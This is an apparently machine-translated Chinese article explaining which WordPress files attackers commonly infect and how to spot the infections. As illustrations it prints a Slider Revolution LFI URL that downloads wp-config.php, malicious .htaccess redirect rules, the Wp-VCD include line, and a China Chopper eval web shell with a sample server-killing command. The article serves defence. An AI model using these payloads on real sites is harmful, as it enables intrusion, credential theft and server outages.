WordPress使創建網站變得非常簡單,並鼓勵人們從各種背景進行在線展示。
創建自己的網站時,請務必保護WordPress保護。一天早上,您要做的最後一件事是醒來,看到您的網站被黑,您的所有增長和SEO努力都花光了。
由於其成功以及主題和插件,黑客傾向於使用WordPress。如果他們發現一個插件存在缺陷,則幾乎所有啟用了該插件的網站都可能會被輕易濫用。
例如,以Elementor和Ultimate Addons中的最新漏洞為例。據估計,自從該漏洞被發現以來,超過100萬個使用Elementor Pro的網站以及110,000個帶有Ultimate Addons的頁面被暴露。插件中的故障使授權用戶可以將任意文件上傳到遠程代碼執行(RCE)網站。黑客可以藉此獲得並保留對WordPress的完整功能訪問。
同樣,在「 Slider Revolution」插件中,存在一個LFI漏洞,使黑客有可能從不安全的WordPress頁面下載wp-config.php。這導致資料庫詳細信息,加密密鑰以及有關網站設置的其他機密信息泄漏。這以前稱為wp-config.php hack。
在本文檔中,我們將討論WordPress帳戶上的黑客和惡意軟體可能已擊中的所有基本文件和位置。
1)WordPress黑客wp-config.php
對於WP安裝,wp-config.php是必不可少的文件。Web使用的配置文件充當資料庫和WP文件系統之間的介面。文件wp-config.php包含敏感材料,例如:
- 主機資料庫
- 密碼,用戶名和埠號
- 資料庫名稱
- WordPress保護的關鍵
- 資料庫表前綴
由於其至關重要的特性,它是黑客之間共同的目標。2016年11月,在Revolution Picture Slider插件中發現了一個關鍵錯誤。如果黑客從wp-config.php漏洞中獲取資料庫登錄信息,他們將嘗試鏈接到資料庫並為自己建立偽造的WP管理員帳戶。
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
這是一個LFI(本地文件包含)入侵,使黑客能夠下載wp-config文件。這提供了一個網站,存檔可直接訪問它們。黑客會暴露於機密數據,例如用戶憑據,電子郵件ID,目錄,照片,來自WooCommerce的交易信息等。他們還可以安裝腳本,例如Filesman後門,以提供對WordPress帳戶的持續訪問。
2)WordPress的Index.php被黑客入侵
index.php文件是WordPress上每個網站的入口點。由於此代碼運行在您網站的每個頁面上,因此黑客會插入影響您整個網站的惡意代碼。
例如,pub2srv惡意軟體和Favicon惡意軟體黑客的目標index.php文件。Astra Security的研究人員追蹤了這種廣泛分布的惡意軟體重定向活動,發現將@include「 \ x2f / sgb \ x2ffavi \ x63on_5 \ x34e6ed \ x2eico」之類的惡意代碼應用於index.php文件;以及以下屏幕截圖中的代碼:
發現惡意代碼已插入WordPress安裝的index.php文件中
後來由於一些勒索軟體活動將index.php文件更改為index.php.bak,迫使網站崩潰而根本無法載入。
在index.php文件中,此類惡意代碼可能導致網站訪問者看到奇怪的彈出窗口,商業廣告,甚至被路由到其他垃圾郵件頁面。將此文件的內容與WordPress發布的初始副本進行比較,以修復此類黑客。
3)WordPress .htaccess文件被黑客入侵
通常在WordPress網站的主頁位置中找到的.htaccess文件可幫助根據網站要求配置伺服器設置。這通常在Apache上運行的伺服器中找到。.htaccess文件是用於控制Web伺服器的性能和行為的非常強大的組件。它也可以用來控制您網站的安全性。以下是.htaccess文件的一些常見用法:
- 限制對某些站點文件夾的訪問
- 配置站點的最大內存使用率
- 構建重定向
- HTTPS控制
- 緩存管理
- 通過腳本注入防止一些攻擊
- 最大文件上傳大小控制
- 阻止機器人能夠找到用戶名
- 熱鏈接塊圖像
- 控制自動文件下載
- 管理文件擴展名
但是,這些特徵可用於在受到攻擊時為攻擊者提取點擊。為了重定向用戶,.htaccess文件通常帶有惡意代碼。它通常用於查看對消費者的垃圾郵件。例如,查看下面提供的代碼:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]在最後一行,惡意代碼正在從站點重定向用戶流量。結果,tohttp:/MaliciousDomain.tld被重定向到用戶。然後,thebad.php腳本嘗試載入。由於.htaccess文件被黑客入侵,如果您發現來自站點的異常重定向,則有可能。但是,如果找不到該文件或該文件為空,請不要驚慌,因為該文件不是必需的(除非您使用漂亮的WordPress URL)。
4)WordPress footer.php和header.php(WordPress主題黑客入侵的文件)
每個WordPress主題都有一個名為footer.php和header.php的文件,其中包含該網站的頁腳和標頭代碼。該區域中包含腳本和某些在整個網站上保持不變的小部件。例如,網站底部的共享窗口小部件或社交媒體窗口小部件。有時也可能只是版權信息,信用證等。
因此,這兩個文件是攻擊者可以破解的關鍵文件。它通常用於重定向惡意軟體並顯示垃圾郵件內容,就像「重定向惡意軟體」 digestcolect [.com]一樣。
其中一些被解碼,黑客被發現利用瀏覽器cookie來識別用戶並向他們顯示惡意廣告等。
此外,在另一個實例中,攻擊者將JavaScript代碼注入了擴展名為.js的所有文件中。由於受到大規模感染,此類黑客通常變得難以清除。
5)WordPress.php的功能被黑客入侵
在主題文件夾中,功能文件的作用類似於插件。這意味著它可以用於向WordPress網站添加其他功能。可以使用filefunctions.php用於:
- WordPress的呼叫事件/功能
- 調用PHP的本機函數。
- 或描述自己的功能。
對於任何主題,均存在functions.php文件,但請務必記住,在每個給定時刻僅運行一個functions.php文件,即活動主題中的一個。因此,在Wp-VCD後門攻擊中,functions.php文件被攻擊者蓄意攻擊。該惡意軟體(例如Pharma和日語SEO垃圾郵件)創建了新管理員,並在網站上注入了垃圾郵件頁面。
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>從上面的代碼中可以明顯看出,該軟體包含class.theme-modules.php軟體。然後,使用該文件(即使已禁用)也可以將惡意軟體注入您網站上構建的其他主題。這樣就創建了新用戶和後門。即使清除了文件,這也使攻擊者可以訪問該站點。
6)黑客WordPress wp-load.php WordPress
WordPress平台的重要文件是wp-load.php。文件wp-load.php可以引導WordPress環境,並允許插件有權訪問本機WP的關鍵功能。如China Chopper Web Shell勒索軟體所示,許多惡意軟體變體通過生成惡意的wp-load檔案感染WordPress頁面。通常的操作是在伺服器上開發wp-load-eFtAh.php之類的文件。由於名稱與原始文件的名稱匹配,因此登錄FTP時不會發現它很奇怪。這些文件可能具有以下代碼:
<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>此代碼可幫助入侵者在黑客提交的Web上的pass參數中運行每個PHP代碼。使用此漏洞可能會實施有害的指令。http:/ yoursite / your.php?命令,例如,pass = system(「 killall -9 apache」);「可能會殺死Web伺服器的進程。這將導致整個伺服器關閉。不要按其長度來判斷該代碼,因為它不夠安全,無法遠程監視您的伺服器。
7)大量的class-wp-cache.php伺服器文件
我們已經看到cPanel和整個Web伺服器在最近的一次黑客攻擊中獲得了數百萬甚至數千個class-wp-cache.php文件。這些惡意文件破壞了網站的每個文件夾,包括主文件。網站代碼中的漏洞為黑客打開了大門,通常是這種感染的來源。